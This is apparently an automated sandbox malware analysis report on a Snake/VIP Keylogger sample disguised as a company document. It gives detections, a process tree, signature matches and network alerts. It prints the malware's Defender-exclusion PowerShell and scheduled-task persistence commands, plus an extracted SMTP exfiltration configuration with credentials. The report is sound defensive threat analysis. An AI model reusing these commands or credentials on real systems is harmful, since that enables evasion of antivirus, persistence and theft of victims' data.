Edit tour

Windows Analysis Report
Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Overview

General Information

Sample name:	Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Analysis ID:	1501092
MD5:	b2fcde172f7605e8a4af7b60349418d7
SHA1:	7279c465e2ea6ced62c742c679db21ec9a9a4514
SHA256:	8fcc14a7d1f657fd1cf84282ad1d81404e7ccc253e9ad8f36ccd9118a674d6cc
Tags:	exeSnakeKeylogger
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Autofill Manufacturing Sdn Bhd 28-08-2024.exe (PID: 7968 cmdline: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" MD5: B2FCDE172F7605E8A4AF7B60349418D7)

powershell.exe (PID: 8140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2712 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7476 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Autofill Manufacturing Sdn Bhd 28-08-2024.exe (PID: 4820 cmdline: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" MD5: B2FCDE172F7605E8A4AF7B60349418D7)

GhrKoSGuCdvpJ.exe (PID: 7032 cmdline: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe MD5: B2FCDE172F7605E8A4AF7B60349418D7)

schtasks.exe (PID: 7712 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GhrKoSGuCdvpJ.exe (PID: 4268 cmdline: "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" MD5: B2FCDE172F7605E8A4AF7B60349418D7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "Oqc9k0@9", "Password": "mail.laime.it", "Host": "clone@glamourstorepa.com.br", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@laime.it", "Password": "Oqc9k0@9", "Host": "mail.laime.it", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dcca:$a1: get_encryptedPassword 0x706ea:$a1: get_encryptedPassword 0xb2f0a:$a1: get_encryptedPassword 0x2dfdf:$a2: get_encryptedUsername 0x709ff:$a2: get_encryptedUsername 0xb321f:$a2: get_encryptedUsername 0x2dada:$a3: get_timePasswordChanged 0x704fa:$a3: get_timePasswordChanged 0xb2d1a:$a3: get_timePasswordChanged 0x2dbe3:$a4: get_passwordField 0x70603:$a4: get_passwordField 0xb2e23:$a4: get_passwordField 0x2dce0:$a5: set_encryptedPassword 0x70700:$a5: set_encryptedPassword 0xb2f20:$a5: set_encryptedPassword 0x2f37b:$a7: get_logins 0x71d9b:$a7: get_logins 0xb45bb:$a7: get_logins 0x2f2de:$a10: KeyLoggerEventArgs 0x71cfe:$a10: KeyLoggerEventArgs 0xb451e:$a10: KeyLoggerEventArgs
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xcadb:$a1: get_encryptedPassword 0xcde6:$a2: get_encryptedUsername 0xc8f5:$a3: get_timePasswordChanged 0xc9fe:$a4: get_passwordField 0xcaf1:$a5: set_encryptedPassword 0xef7b:$a7: get_logins 0xeede:$a10: KeyLoggerEventArgs 0xeb47:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: GhrKoSGuCdvpJ.exe PID: 7032	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de59:$s1: UnHook 0x2de60:$s2: SetHook 0x2de68:$s3: CallNextHook 0x2de75:$s4: _hook
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b45a:$a1: get_encryptedPassword 0x2b76f:$a2: get_encryptedUsername 0x2b26a:$a3: get_timePasswordChanged 0x2b373:$a4: get_passwordField 0x2b470:$a5: set_encryptedPassword 0x2cb0b:$a7: get_logins 0x2ca6e:$a10: KeyLoggerEventArgs 0x2c6d3:$a11: KeyLoggerEventArgsEventHandler
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x391de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38881:$a3: \Google\Chrome\User Data\Default\Login Data 0x38ade:$a4: \Orbitum\User Data\Default\Login Data 0x394bd:$a5: \Kometa\User Data\Default\Login Data
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c059:$s1: UnHook 0x2c060:$s2: SetHook 0x2c068:$s3: CallNextHook 0x2c075:$s4: _hook
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b45a:$a1: get_encryptedPassword 0x2b76f:$a2: get_encryptedUsername 0x2b26a:$a3: get_timePasswordChanged 0x2b373:$a4: get_passwordField 0x2b470:$a5: set_encryptedPassword 0x2cb0b:$a7: get_logins 0x2ca6e:$a10: KeyLoggerEventArgs 0x2c6d3:$a11: KeyLoggerEventArgsEventHandler
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x391de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38881:$a3: \Google\Chrome\User Data\Default\Login Data 0x38ade:$a4: \Orbitum\User Data\Default\Login Data 0x394bd:$a5: \Kometa\User Data\Default\Login Data
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c059:$s1: UnHook 0x2c060:$s2: SetHook 0x2c068:$s3: CallNextHook 0x2c075:$s4: _hook
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d25a:$a1: get_encryptedPassword 0x6fa7a:$a1: get_encryptedPassword 0x2d56f:$a2: get_encryptedUsername 0x6fd8f:$a2: get_encryptedUsername 0x2d06a:$a3: get_timePasswordChanged 0x6f88a:$a3: get_timePasswordChanged 0x2d173:$a4: get_passwordField 0x6f993:$a4: get_passwordField 0x2d270:$a5: set_encryptedPassword 0x6fa90:$a5: set_encryptedPassword 0x2e90b:$a7: get_logins 0x7112b:$a7: get_logins 0x2e86e:$a10: KeyLoggerEventArgs 0x7108e:$a10: KeyLoggerEventArgs 0x2e4d3:$a11: KeyLoggerEventArgsEventHandler 0x70cf3:$a11: KeyLoggerEventArgsEventHandler
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de59:$s1: UnHook 0x70679:$s1: UnHook 0x2de60:$s2: SetHook 0x70680:$s2: SetHook 0x2de68:$s3: CallNextHook 0x70688:$s3: CallNextHook 0x2de75:$s4: _hook 0x70695:$s4: _hook
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d25a:$a1: get_encryptedPassword 0x6fc7a:$a1: get_encryptedPassword 0xb249a:$a1: get_encryptedPassword 0x2d56f:$a2: get_encryptedUsername 0x6ff8f:$a2: get_encryptedUsername 0xb27af:$a2: get_encryptedUsername 0x2d06a:$a3: get_timePasswordChanged 0x6fa8a:$a3: get_timePasswordChanged 0xb22aa:$a3: get_timePasswordChanged 0x2d173:$a4: get_passwordField 0x6fb93:$a4: get_passwordField 0xb23b3:$a4: get_passwordField 0x2d270:$a5: set_encryptedPassword 0x6fc90:$a5: set_encryptedPassword 0xb24b0:$a5: set_encryptedPassword 0x2e90b:$a7: get_logins 0x7132b:$a7: get_logins 0xb3b4b:$a7: get_logins 0x2e86e:$a10: KeyLoggerEventArgs 0x7128e:$a10: KeyLoggerEventArgs 0xb3aae:$a10: KeyLoggerEventArgs
0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de59:$s1: UnHook 0x70879:$s1: UnHook 0xb3099:$s1: UnHook 0x2de60:$s2: SetHook 0x70880:$s2: SetHook 0xb30a0:$s2: SetHook 0x2de68:$s3: CallNextHook 0x70888:$s3: CallNextHook 0xb30a8:$s3: CallNextHook 0x2de75:$s4: _hook 0x70895:$s4: _hook 0xb30b5:$s4: _hook
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ProcessId: 8140, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe, ParentImage: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe, ParentProcessId: 7032, ParentProcessName: GhrKoSGuCdvpJ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp", ProcessId: 7712, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", ProcessId: 7476, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ProcessId: 8140, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe", ParentImage: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ParentProcessId: 7968, ParentProcessName: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp", ProcessId: 7476, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:25.120780+0200
SID:	2803274
Severity:	2
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:22.828528+0200
SID:	2803274
Severity:	2
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:28.698912+0200
SID:	2803274
Severity:	2
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:18.292635+0200
SID:	2803274
Severity:	2
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:27.215975+0200
SID:	2803305
Severity:	3
Source Port:	49721
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:24.148322+0200
SID:	2803305
Severity:	3
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:29.337371+0200
SID:	2803305
Severity:	3
Source Port:	49725
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:29.465790+0200
SID:	2803305
Severity:	3
Source Port:	49726
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:24.261401+0200
SID:	2803274
Severity:	2
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:25.685896+0200
SID:	2803305
Severity:	3
Source Port:	49718
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:21.455030+0200
SID:	2803274
Severity:	2
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:18.741649+0200
SID:	2803305
Severity:	3
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:26.386413+0200
SID:	2803274
Severity:	2
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.6.168

Timestamp:	2024-08-29T12:16:16.777161+0200
SID:	2803274
Severity:	2
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:30.721477+0200
SID:	2803305
Severity:	3
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T12:16:27.195934+0200
SID:	2803305
Severity:	3
Source Port:	49720
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
